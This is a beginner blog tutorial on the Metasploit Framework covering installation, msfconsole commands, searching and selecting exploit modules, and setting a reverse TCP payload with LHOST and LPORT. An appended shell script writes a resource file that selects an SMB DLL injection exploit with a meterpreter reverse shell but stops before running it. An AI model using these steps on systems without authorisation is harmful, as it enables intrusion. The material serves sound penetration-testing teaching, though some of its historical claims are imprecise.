Saturday, July 11, 2020

Complete Metasploit guide (Part 1: Introduction and preparation of exploits and payloads)

This complete guide to the Metasploit Framework will help you in penetration testing and bug bounty work. Let's start by familiarizing ourselves with the Metasploit Framework.

What is the Metasploit Framework

The Metasploit Framework is a tool that comes pre-installed in Kali Linux. Most of the time it is used for exploitation; sometimes you can also use it for scanning. It ships with modules, payloads, nops and the other components that we will talk about.

But before we begin using them, let's make sure we understand them. After that, we will execute our first exploit.

So as I said, the Metasploit Framework is a tool for developing and executing code against a remote target machine. Alongside the framework itself, which is the tool we will use, there is the MSF payload creator. You start the framework with a simple command called msfconsole.

The two terms you will hear most in this section are exploit and payload. I believe most of you already know what they are, but just in case: the exploit is the main action of the attack. For example, if the target is running vulnerable software, we can take advantage of it, exploit it, and run our reverse shell or rootkit on it. I'll explain what reverse shells and rootkits are later. One term about the exploitation process that you should know is zero-day. A zero-day is an exploit for a vulnerable system that hasn't been discovered previously; that's why it's called a zero-day: it hasn't been fixed yet, and the vulnerable software is still out there. You will most likely not encounter these attacks, since zero-days are only discovered a few times a year. There are different types of zero-day, and some are more dangerous than others.

One zero-day found in 2017 was an exploit that allowed anyone to access a Windows 7 machine, and I think also a Windows 8 machine, without the user clicking on anything. You could just connect to the same network and exploit the Windows 7 machine if it had port 445 (SMB) open. It was discovered by some hackers; it was an NSA exploit called EternalBlue.
I will also show it to you in the Metasploit Framework later on, but that is the basic meaning of a zero-day attack. We will not be discovering zero-days ourselves, because such attacks, if ever discovered, can be costly: they can be worth upwards of $100,000. So if you were to discover a zero-day, you could sell it for a hundred thousand dollars or more. I believe that if you were to find a zero-day for the iPhone, Apple would pay you thousands of dollars!

We will exploit targets with already known exploits and with our own reverse shells that we run on the target. The payload is basically that reverse shell: after we exploit the vulnerable software, we deliver the payload to the machine so that it gives us a session or some information back. We will cover all of this in detail in the next articles, but for now let's start the Metasploit Framework and look at the environment.

Installing the Metasploit Framework

If Metasploit is not installed on your Linux system, use the command

apt install metasploit-framework

Before you type msfconsole, which is the command for starting the Metasploit Framework, I would advise you to start the PostgreSQL service:

service postgresql start

This will make Metasploit run faster since it uses the database. You do not need to do this if you don't want to, but as I said it makes Metasploit run faster. Now that we have run this, we can finally open the Metasploit Framework. To do that, you just need to type

msfconsole

Press enter and wait for it to open. Since this is a virtual machine, it might take a few seconds depending on your PC's speed. Once it opens, we will cover some of the basic commands you will use to navigate the Metasploit Framework.

The first thing you notice is the banner; it is different most of the time, as they change it often. The next thing you see is what is currently available in the Metasploit Framework at this time, July 2020: 2004 exploits, 1049 auxiliary modules, 343 post-exploitation modules, 562 payloads, 45 encoders, 10 nops and 7 evasion modules.

We will cover what all of these are in the next articles, but for now let's see how to navigate the framework. Our command line is the prompt

msf5 >

and here we type our commands. So the first logical thing to do is type

help

help lists the commands that are available right now. One of the useful ones is the use command; you will use it a lot. You just type use followed by the name of the exploit you want to use: it selects a module by name. But to select a module you need to know its name, and since we are beginners we don't know the name of any module. So we can use the search command to find modules:

Search modules in Metasploit

search looks through module names and descriptions. Let's say we want to find Windows exploits; just type

search windows

It will list all of the available Windows exploits and payloads in the Metasploit Framework.

These are all of the modules available for Windows. For example we can see the payload windows reverse TCP, and you can select it and see more details about it.
This command shows all exploits, payloads and post modules related to Windows, but if you want to search only for exploits, type

search exploit/windows

There are lots of them. As I said, there are over 1800 exploits in the Metasploit Framework.
We will cover only a few of them, since covering all of them would make this course thousands of hours long.

 Options of exploits in Metasploit

Let's select a random exploit to understand this, for example generic smb DLL injection.
To pick that exploit we simply type use, then paste the name of the exploit and press enter. You can tell you typed the correct name when the exploit name appears in red letters in the brackets of the prompt; that means the exploit exists.
Now that we have selected the exploit, we can see its options with the show command:

show options

This will give us all of the options for this exploit and what it requires in order to run.

Each option has a current setting, a required flag (if an option is required and not yet set, you need to specify it) and a description. For this exploit, one description reads "the local host to listen on", which must be an address on the local machine; the server port is 445; and the local port to listen on is also a required field.
Further down we see the exploit target. To check the available targets, type
show targets

and it prints a list of all targets available for this exploit. We can see this exploit is for Windows x86 and Windows x64, so it runs on the Windows platform.

 All Information about the exploit in Metasploit

If you don't know much about this exploit, you will want to find out more about it. You can do that with

show info

This will print out exactly what this exploit is. It shows the name, module and platform, and basically the output of the previous commands: available targets, whether check is supported, the basic options we saw before, payload information and the description. The description is most likely what you are looking for with this command.

You can also see the references. If you copy one of these links and open it in the browser, it will take you to a page where this exploit is described in greater detail.

You can read it if you want to, and you can also visit other sites that explain this exploit in detail.

Payloads for exploits in Metasploit

If you want to deliver a payload with this exploit, you can see the available payloads with

show payloads

show payloads gives you the payloads available for this exploit. For example, our reverse TCP payload cannot be used here, since it is not listed in the show payloads output; you can only use the payloads that are listed. Once you have looked through them and chosen one, you set it by typing

set payload (payload name)

As we can see, we successfully set the payload with this command. If you mistype it, it says no such payload available. After selecting the payload, run show options again and you will see additional options for the payload. Most of the time you will see these two: LHOST and LPORT. LHOST is the listen address, i.e. your Kali Linux machine, since you are listening for the connection back from the target machine.

LPORT is the port you are listening on; by default in Metasploit it is 4444.
You configure these fields with the set command, for example set LHOST followed by your own address.

Now you would be able to run this payload or exploit against your target if you find a vulnerable one. I will not run this exploit since I don't have a vulnerable target, but I wanted to show you the commands you will use to select your exploits. We will actually exploit and run some scanners in the next sections, right after we cover the basic structure of the Metasploit Framework itself. I will explain what nops, encoders, payloads, exploits and post-exploitation tools are.
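The selection steps above (start PostgreSQL, use a module, show targets and payloads, set the payload, set LHOST and LPORT, show options) are exactly what an msfconsole resource script can replay. The script below is an added example, not code from the original post or from the Metasploit project: it validates LHOST and LPORT before writing the script, and stops at show options, as the post does, so the operator reviews the settings before anything else happens. It assumes the standard msfconsole -q (quiet) and -r (resource file) flags and the post's service postgresql start; the module and payload paths in the usage line are my assumption of the names the post's search would return for "generic smb DLL injection" and its reverse TCP payload, and the LHOST value is a constructed lab address.

```shell
#!/bin/sh
# Added example, not code from the original post. It scripts the steps the
# post walks through by hand in msfconsole (use a module, show targets and
# payloads, set the payload, set LHOST/LPORT, show options) as a resource
# script, validating LHOST and LPORT before anything is written.
# Assumptions: 'service postgresql start' and 'msfconsole -q -r <file>' are
# the post's command and the standard msfconsole flags; module and payload
# names are supplied by the caller (take them from the 'search' output).

# Return 0 if $1 is a dotted-quad IPv4 address with every octet in 0-255.
valid_ipv4() {
    echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    # Subshell so changing IFS does not leak into the caller.
    (
        IFS=.
        for octet in $1; do
            [ "$octet" -le 255 ] || exit 1
        done
    )
}

# Return 0 if $1 is a TCP port number in 1-65535.
valid_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Print a resource script to stdout.
# Arguments: module payload lhost lport. Returns 1 on a bad LHOST or LPORT.
# Ends with 'show options' rather than 'run', as the post does: the operator
# reviews the settings before deciding whether to launch anything.
build_rc() {
    module=$1; payload=$2; lhost=$3; lport=$4
    valid_ipv4 "$lhost" || { echo "invalid LHOST: $lhost" >&2; return 1; }
    valid_port "$lport" || { echo "invalid LPORT: $lport" >&2; return 1; }
    printf 'use %s\n' "$module"
    printf 'show targets\n'
    printf 'show payloads\n'
    printf 'set payload %s\n' "$payload"
    printf 'set LHOST %s\n' "$lhost"
    printf 'set LPORT %s\n' "$lport"
    printf 'show options\n'
}

# Start the database (the post's speed-up) and feed the script to msfconsole
# in quiet mode. Returns 2 without doing anything if msfconsole is missing.
launch_rc() {
    rc_file=$1
    command -v msfconsole >/dev/null 2>&1 || {
        echo "msfconsole not found (apt install metasploit-framework)" >&2
        return 2
    }
    service postgresql start
    msfconsole -q -r "$rc_file"
}

# Usage: write the script, then launch it. 192.168.56.1 is a constructed lab
# address; the module and payload paths are assumed names for the post's
# "generic smb DLL injection" exploit and its reverse TCP payload.
if [ "${1:-}" = "--run" ]; then
    rc_file=${TMPDIR:-/tmp}/msf_select.rc
    build_rc exploit/windows/smb/generic_smb_dll_injection \
             windows/meterpreter/reverse_tcp 192.168.56.1 4444 > "$rc_file" \
        && launch_rc "$rc_file"
fi
```

Run it with the --run argument to generate and launch the script; without it the functions are only defined, so the file can be sourced and build_rc called by hand to inspect the generated commands first. Validating LHOST up front matters because msfconsole happily accepts a mistyped listener address and the reverse connection then simply never arrives.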

You can also run system commands from this console. Any command you can run from a normal terminal, you can run from the Metasploit Framework command line, so you can also run Nmap or netstat, or anything else, from here.

So you do not need to leave Metasploit to perform a scan or any other step of the attack.